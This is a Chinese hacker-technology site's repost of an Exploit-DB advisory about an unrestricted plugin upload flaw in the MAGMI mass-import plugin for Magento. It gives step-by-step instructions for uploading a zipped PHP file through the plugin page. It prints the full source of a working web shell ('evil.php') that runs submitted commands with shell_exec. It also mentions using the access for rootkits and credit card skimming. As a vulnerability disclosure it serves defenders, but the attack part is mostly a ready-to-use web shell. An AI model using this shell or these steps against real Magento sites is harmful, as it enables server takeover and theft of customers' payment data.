记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

WEB应用漏洞: - Magento Server MAGMI Plugin - Remote File Inclusion (RFI)

2014-10-25 19:25
Exploit found date:  10/24/2014
Security Researcher name: Parvinder Singh Bhasin
Contact info: parvinder.bhasin@gmail.com
twitter: @parvinderb <scorpio>


Currently tested version:
Magento version: Magento CE - 1.8 and newer versions
MAGMI version: v0.7.17a and greater

MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.

Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.

Steps to reproduce:

1. http://<a magentosite.com>/magmi/web/magmi.php
2. Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.

evil.php:

<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";

if(function_exists('shell_exec')) {
$command=$_POST['command'];
$output = shell_exec("$command");
echo "<pre>$output</pre>";
}
}
else {
echo "<form action='evil.php' method='post'>
<input type='text' name='command' value=''/>
<input type='submit' value='execute'/>
</form>";
}
?>

3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php

At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.



知识来源: www.exploit-db.com/exploits/35052

阅读:110952 | 评论:0 | 标签:webapps

想收藏或者和大家分享这篇好文章→复制链接地址

“WEB应用漏洞: - Magento Server MAGMI Plugin - Remote File Inclusion (RFI)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云